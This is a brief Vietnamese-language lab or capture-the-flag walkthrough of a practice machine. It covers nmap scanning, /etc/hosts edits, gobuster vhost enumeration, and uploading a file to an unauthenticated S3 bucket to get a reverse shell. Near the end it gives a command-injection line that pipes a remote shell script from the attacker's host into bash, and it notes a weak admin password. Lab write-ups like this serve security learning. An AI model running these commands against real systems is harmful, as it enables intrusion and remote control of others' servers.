Kinh nghiệm exploit - bài 2 - hosts ect - web - domain - vhost enumeration

Scanning

lika@learning:~/Downloads$ cnmap -sC -sV -T4 10.129.227.248
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 16:58 +07
Nmap scan report for 10.129.227.248
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
|   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
|_  256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Toppers
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.88 seconds

Sau khi scan, thử sức trước với port 80 Kinh nghiệm là khi vào web, bị bể css hoặc, đang attack web với IP, thì trong web có xuất hiện email, nên thử vhost enumeration với gobuster Hoặc web bị bể css, add hostfile sau khi view source code

nano /etc/hosts

Scan with gobuster

gobuster vhost --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://abc.com

Tìm được một domain với dạng s3.domain.com Sau đó thử với aws cli để kết nối (không authorization) và kết nối được -> Sử dụng aws cli để upload file và tạo reverse shell sau đó tìm flag Hoặc dùng cách http://$IP/?cmd=curl $myIP/shell.sh | bash Để run sh sau khi listen ở attack machine Thử với top 10 common password - vì không brute force được Login được với admin - 1234567890